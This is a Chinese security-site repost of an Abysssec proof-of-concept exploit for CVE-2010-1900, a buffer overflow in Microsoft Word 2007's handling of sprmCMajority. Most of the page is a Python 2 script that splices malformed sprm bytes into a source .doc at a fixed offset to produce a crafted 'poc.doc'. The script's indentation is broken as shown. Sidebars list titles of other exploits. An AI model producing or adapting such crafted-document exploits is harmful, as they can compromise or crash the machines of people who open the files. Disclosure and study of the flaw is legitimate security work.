首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Office Word 2007 sprmCMajority Buffer Overflow
来源:http://www.abysssec.com 作者:Abysssec 发布时间:2010-09-13  

'''
  __  __  ____         _    _ ____ 
 |  \/  |/ __ \   /\  | |  | |  _ \
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ <
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/

http://www.exploit-db.com/moaub11-microsoft-office-word-sprmcmajority-buffer-overflow/
http://www.exploit-db.com/sploits/moaub-11-exploit.zip
'''

'''
  Title               :  Microsoft Office Word sprmCMajority buffer overflow
  Version             :  Word 2007 SP 2
  Analysis           :  http://www.abysssec.com
  Vendor              :  http://www.microsoft.com
  Impact              :  Critical
  Contact             :  shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter             :  @abysssec
  CVE                 :  CVE-2010-1900

'''

import sys

def main():
  
    try:
  fdR = open('src.doc', 'rb+')
  strTotal = fdR.read()
  str1 = strTotal[:4082]
  str2 = strTotal[4088:]
  
  sprmCMajority = "\x47\xCA\xFF"    # sprmCMajority 
  sprmPAnld80 = "\x3E\xC6\xFF"    # sprmPAnld80
    
  fdW= open('poc.doc', 'wb+')
  fdW.write(str1)
  fdW.write(sprmCMajority)
  fdW.write(sprmPAnld80)    
  fdW.write(str2)
  
  fdW.close()
  fdR.close()
  print '[-] Word file generated'
    except IOError:
        print '[*] Error : An IO error has occurred'
        print '[-] Exiting ...'
        sys.exit(-1)
               
if __name__ == '__main__':
    main()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·Yahoo! Messenger Webcam 8.1 Ac
·VideoScript 3.0 <= 4.0.1.50 Of
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Webkit (Apple Safari < 4.1.2/5
·YOPS Web Server Remote Command
·Excel RTD Memory Corruption
·Adobe Acrobat and Reader "push
·QK SMTP Server 3 RCPT TO: Comm
·Prevx DLL preloading exploit
·Wordpress 3.0.1 - Remote Denia
·Dmx Ready v2 lite Database Dis
·Kingsoft Antivirus <= 2010.04.
·BlogItDL Database Disclosure E
·AA SMTP SERVER v.1.1 - Crash P
·Beta Asp - Anket Database Disc
  推荐广告
CopyRight © 2002-2020 VFocuS.Net All Rights Reserved